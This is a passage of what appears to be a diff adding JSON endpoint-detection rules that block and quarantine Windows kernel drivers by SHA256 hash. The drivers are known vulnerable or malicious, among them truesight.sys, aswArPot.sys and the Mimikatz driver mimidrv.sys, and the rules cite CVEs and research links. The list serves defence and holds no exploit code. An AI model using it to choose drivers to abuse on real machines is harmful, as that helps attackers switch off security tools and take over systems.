+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618887Z",
+ "creation_date": "2026-03-23T11:45:29.618889Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618894Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6",
+ "comment": "Vulnerable Kernel Driver (aka amp.sys) [https://www.loldrivers.io/drivers/ca768fc5-9b5c-4ced-90ab-fd6be9a70199/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88e5f198-b107-579e-a5e4-d97baf71c799",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475446Z",
+ "creation_date": "2026-03-23T11:45:30.475449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42ff11ddb46dfe5fa895e7babf88ee27790cde53a9139fc384346a89e802a327",
+ "comment": "Malicious Kernel Driver (aka a26363e7b02b13f2b8d697abb90cd5c3.sys) [https://www.loldrivers.io/drivers/ef6b5fe8-6c4b-4b32-8adc-c1d8a83e8558/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88ee419a-6dfb-573a-b316-977b6085be0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478475Z",
+ "creation_date": "2026-03-23T11:45:31.478491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43a059aae1238eb3a19fd1ee7a7c9ef3ddfe903bab91c377b4e44238010b4b7f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88f5eb26-4477-5a52-99c0-8509e0d33537",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605647Z",
+ "creation_date": "2026-03-23T11:45:29.605649Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e944ae1bfe43a8a7cd2ea65e518a30172ce8f31223bdfd39701b2cb41d8a9e7",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88faca8b-0bd8-52ab-8b66-794997efe566",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475251Z",
+ "creation_date": "2026-03-23T11:45:31.475255Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b89b1e137d6bdac313585b007d5d063d8a5c7864b42017d8d1a7188d6b1276d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88fd5d44-19da-537e-b0af-1953bc63e9b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820231Z",
+ "creation_date": "2026-03-23T11:45:30.820232Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820238Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73664268a737d071f2c3c67503002db08432953f14771317835b6f080d3daeff",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "890a040d-13d9-583a-b30d-a90821109f33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618603Z",
+ "creation_date": "2026-03-23T11:45:29.618605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc041a5c21339d62c9ea05215c2c42697f73a3820c83133eb6c6fa574a095384",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89122970-562e-5a50-bb3a-e07fc760d058",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610141Z",
+ "creation_date": "2026-03-23T11:45:29.610143Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610149Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45c3d607cb57a1714c1c604a25cbadf2779f4734855d0e43aa394073b6966b26",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89237bd7-2fc4-5256-bca6-fb30fb8c6b1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467678Z",
+ "creation_date": "2026-03-23T11:45:30.467681Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467690Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63e9918f94a1ae5d71e8972f49bfbce13d8b1774b7237b022f182f03cc9ce715",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "892a5e6f-133a-5067-8c1c-f552f00b5b47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485978Z",
+ "creation_date": "2026-03-23T11:45:31.485982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba874cc6574578d137caea35cd8e2133ed9d5ad55fb16701dd3d4be74cff9468",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8940aa3e-12ac-5608-ad60-0cc75913fc40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972843Z",
+ "creation_date": "2026-03-23T11:45:29.972846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56e8b8d21317d58abd8399b276ee800c62a53e864cd3553899e33b8616ef07a6",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8945d603-a254-516a-9d54-b613645f43dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969221Z",
+ "creation_date": "2026-03-23T11:45:29.969223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2f45d95d54f4e110b577e621fefa0483fa0e3dcca14c500c298fb9209e491c1",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89483c03-249d-5141-b24c-f8319bbfa2c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834106Z",
+ "creation_date": "2026-03-23T11:45:30.834109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b783875f123bec0082eabd4fc235f4790337b044fd7c72993ab5f118c16fb04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "895478af-e180-58ff-bc17-7e47393c44c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147130Z",
+ "creation_date": "2026-03-23T11:45:31.147132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21cd1c9f9966b068dcc2eb4e474051a6bd7bbee40b0d034f86a45829f34cc6bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "895b48b0-1d09-5bf9-82e6-cf4e757ac4dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622599Z",
+ "creation_date": "2026-03-23T11:45:29.622601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b186926ed815d87eaf72759a69095a11274f5d13c33b8cc2b8700a1f020be1d",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89604d9c-4223-5668-88f3-d77bff91f14e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497753Z",
+ "creation_date": "2026-03-23T11:45:31.497757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497765Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "147ceda2d23bc576729003070127b1c0fa57d2c5a2e3f52ad7358b1f8c157f9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "896c2171-3a9a-5785-8dc8-f58deffd9594",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494529Z",
+ "creation_date": "2026-03-23T11:45:31.494531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "056b87911f8f7d15bbe242c3b4625bb4cbe98695a38d05c10f3bc3df8de23693",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8972a31a-1295-570b-8dc8-3aba93c6f1c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160755Z",
+ "creation_date": "2026-03-23T11:45:31.160757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e3120166146e5c1c0a0d07ef87fdde6356946e384b9c3ab575449f945430814",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "897c40a0-2f11-51a5-9f6c-a5116648db99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481239Z",
+ "creation_date": "2026-03-23T11:45:30.481241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481246Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8866f6e762dd7dea58c9e9486da53d716f3ae61048a8a10f8033b60fb5028914",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "898d7ef2-6af5-5ac2-9d92-6e3b6eb77455",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480580Z",
+ "creation_date": "2026-03-23T11:45:30.480581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5df689a62003d26df4aefbaed41ec1205abbf3a2e18e1f1d51b97711e8fcdf00",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "899041eb-34cf-5965-8308-192eca166540",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478513Z",
+ "creation_date": "2026-03-23T11:45:30.478516Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ef8c776a6acd4fd360b22e7d053bba961d687c36ec4fcc0b3e2ff1ef7be967e",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89b3dbda-7785-578e-a386-5402b0303e86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829771Z",
+ "creation_date": "2026-03-23T11:45:30.829774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de88b28e2b2a4a6a2aebd0d36a843c7dace17d4d084e0171457f15ace72c69ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89c0f68c-7fcb-5331-9d68-68e0adced549",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831018Z",
+ "creation_date": "2026-03-23T11:45:30.831020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831026Z",
+ "rule_level": null,
+ "rule_level_override": null,
